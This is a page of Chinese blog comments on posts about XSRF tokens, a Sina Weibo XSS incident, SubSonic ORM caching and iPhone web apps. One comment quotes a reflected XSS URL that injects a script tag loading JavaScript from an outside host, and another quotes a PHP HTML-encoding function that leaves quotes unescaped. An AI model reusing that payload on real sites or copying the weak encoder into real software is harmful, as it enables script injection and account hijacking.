wuvist

可能在gb2312转utf8，丢失了某字符， 然后utf8转gb2312则信息不正确

asp.net webform是基于事件驱动的原理来实现的，java下好像也有个JSF也是类似的。MVC是基于请求驱动的设计。 这只是两种不同的设计实现方式而已，没有什么对错，在不同的场景下会有不同的优缺点。 以上为个人观点。 确实如楼主如言，有些时候，用js配合webform的方式，确实很恶心。但有些时间，这种方式又有其它方案无法替代的好处。所以在我做过的项目中，两种方式都有。

不是很明白啥意思，，，感觉不明白就是，，

@随处走走 <input type="hidden" name="_XSRF" value="Attacher can't know this value!" />,这个虽然是hidden，但它的值应该是随机的，每个用户的不一样。攻击者也不可能实时获取这个值

没看明白，还得再看一遍！

我学py2web

谢谢楼主给我讲解了许多我还不了解的东西。。非常有用。

"当攻击者企图从 http://attackerdomain.com/clickme.html 页面提交资料去 http://dummydomain.com/update_nick.aspx 时，浏览器发送的是 dummydomain的 cookie；而这个cookie的值，是attacherdomain.com所无法获得的，也就是说，它无法伪造" 这个楼主能解释一下么， 如果用hidden， 攻击者不是可以查看源代码看到么？

[quote]testzhangsan： [quote]问天： @testzhangsan 漏洞是无穷无尽的，即便是补上了XSRF的漏洞，那也仅仅是没有XSRF的漏洞而已。 打个比方，要入侵一个公司的内网，最容易的方式可以是去泡前台MM，然后送个有木马的U盘给MM。[/quote] 有幽默精神，不错，一看就是情场老手！[/quote] 不过所谓黑客，只知道用计算机的绝对不是超一流黑客。 而会泡MM的才是。

[quote]问天： @testzhangsan 漏洞是无穷无尽的，即便是补上了XSRF的漏洞，那也仅仅是没有XSRF的漏洞而已。 打个比方，要入侵一个公司的内网，最容易的方式可以是去泡前台MM，然后送个有木马的U盘给MM。[/quote] 哈哈，社会工程学学的很好。

有趣！

[quote]问天： @testzhangsan 漏洞是无穷无尽的，即便是补上了XSRF的漏洞，那也仅仅是没有XSRF的漏洞而已。 打个比方，要入侵一个公司的内网，最容易的方式可以是去泡前台MM，然后送个有木马的U盘给MM。[/quote] 有幽默精神，不错，一看就是情场老手！

新浪微博php开发的. function HtmlEncode($fString) { if($fString!="") { $fString = str_replace( '>', '&gt;',$fString); $fString = str_replace( '<', '&lt;',$fString); $fString = str_replace( chr(32), '&nbsp;',$fString); $fString = str_replace( chr(13), ' ',$fString); $fString = str_replace( chr(10) & chr(10), '<br>',$fString); $fString = str_replace( chr(10), '<BR>',$fString); } return $fString; }

@testzhangsan 漏洞是无穷无尽的，即便是补上了XSRF的漏洞，那也仅仅是没有XSRF的漏洞而已。 打个比方，要入侵一个公司的内网，最容易的方式可以是去泡前台MM，然后送个有木马的U盘给MM。

@问天 请问楼主，POST 提交相对来说安全一点，在服务器端验证是否是跨域 Post ，还有验证数据的正确性，比如是否为空，是否是整数等等，以及 Rmove Html 应该就可以了吧 ？这样还有漏洞吗？对 XSRF 不明白！

@影子明 很显然，/pub/star/g/ 后面的字符串会被新浪内部write过，变成类似： * http://weibo.com/pub/star.php?g=xyyyd"><script src=//www.2kt.cn/images/t.js></script>?type=update 的玩意，然后star.php竟然会把querystring中g的值直接显示到页面中，相当于 weibo.com 在自己的页面中嵌入了一个来自于 2kt.cn的js脚本。 这种是相当低级的注入攻击

问题是 他怎么将<script src=//www.2kt.cn/images/t.js></script> 嵌入到新浪微博中的

强烈支持一下。

- -#我自己用的也和这玩意差不多，很丑陋

期待下一篇！

非常不错

@代码乱了 cache money无法对LessThan(20)这样条件的查询进行透明缓存；需要另外编写代码做显式的缓存。

楼主：对于复杂的查询如：DB.Select().From<Product>().Where("Name").EqualTo("test").And("Price").LessThan(20)这样的查询你们是怎么做缓存处理的？

楼主此文应该算是我在博客园见到了，最眼睛一亮的文章了，顶

from subsonic to db4o to ror

我也在用SubSonic.

我在用subsonic，确实是一个不错的产品

Subsonic 有关注哦，做简单的demo时用非常方便，但是复杂的示例时感觉有点怪异。。

期待下文

@微生物 是，微软平台下的开源项目大都如此。 SubSonic算是发展得不错的了；至少，作者本人被微软招安去了。

恩，期待。不过感觉用subsonic的人不怎么多。

标记，也是柔和各个代码，修改，哈哈，有空好好整合一下

不能，那样就成WebOS了。。。水果牌不干这种事。。。

能不能将IPHONE的WEB APP打包成一个WIDGET安装到IPHONE上，就像NOKIA WRT WIDGET一样？

上面已经修正了呀

@菩提树下的杨过 恩，了解的。 但是，我使用的是2003 + IIS 6，还是只能做全局设置。

IIS7上，是可以单独将某个站点设置为32位兼容模式的。

俨然是.net framework的bug: https://connect.microsoft.com/VisualStudio/feedback/details/330926/cryptostream-flushfinalblock-fatal-on-64-bit-os-if-bytearray-is-null

迅雷就一垃圾 我下载只用eMule,那帮吸血雷让我给屏蔽了.

说的很对

请允许我一个外行人 说点外行话
能开发个飞信吗 好想用~~ 不过 我用的是touch

@小猫
--引用--------------------------------------------------
小猫: 只看了第一段,这种东西就不要拿出来丢人了,我自己随便写的都比你这不知道好用多少倍
--------------------------------------------------------
既然你这么说 那么就不要看了。 写这东西丢人吗？ 你说那会岂不...

只看了第一段,这种东西就不要拿出来丢人了,我自己随便写的都比你这不知道好用多少倍

我靠 我很害怕啊 下次不用了 5555555555

呵呵，“不支持各种神奇的关系”　写的挺逗！

java 是垃圾，慢得不行。
.Net 更是超级大垃圾。
拖拉一个控件，绑定一下数据，就成了程序，上帝给他们一只大脑，完全是白给的。

楼主,请把实例代码放上去吧,老实说,你讲的并不是很清楚.

我喜欢你的文字风格……

@在线代理
iUI是iPhone Web App开发专用的，目的是方便实现iPhone Native App的一些界面特性。这个YUI是做不到的……

但是我喜欢YUI。